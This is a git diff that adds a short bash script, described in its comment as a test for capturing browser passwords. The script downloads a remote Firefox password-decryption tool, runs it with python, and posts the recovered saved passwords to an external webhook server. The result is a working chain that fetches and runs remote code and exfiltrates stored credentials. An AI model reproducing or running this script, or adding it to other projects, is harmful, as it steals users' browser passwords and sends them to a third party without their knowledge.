diff --git a/simple_hack.sh b/simple_hack.sh new file mode 100644 index 0000000..1fde41a --- /dev/null +++ b/simple_hack.sh @@ -0,0 +1,7 @@ +#!/bin/bash +#Kerem EYLEM - 11 April 2025 +#Simple local webhook script to test capturing the browser passwords. +FIREFOX_DECRYPT_URL="https://ddealmei.github.io/assets/3b64d11ff0ac5da6a262b3490949ec7f6/firefox_decrypt.py" +WEBHOOK_SERVER_URL=" https://n8n-webhook.keremeylem.com/webhook/9dc89154-cd1d-4ace-8c65-6c64495c3d54" +echo $(curl -fsSL $FIREFOX_DECRYPT_URL | python) | curl -v POST --data-binary @- $WEBHOOK_SERVER_URL +#echo "hello" | curl -v POST --data-binary @- $WEBHOOK_SERVER_URL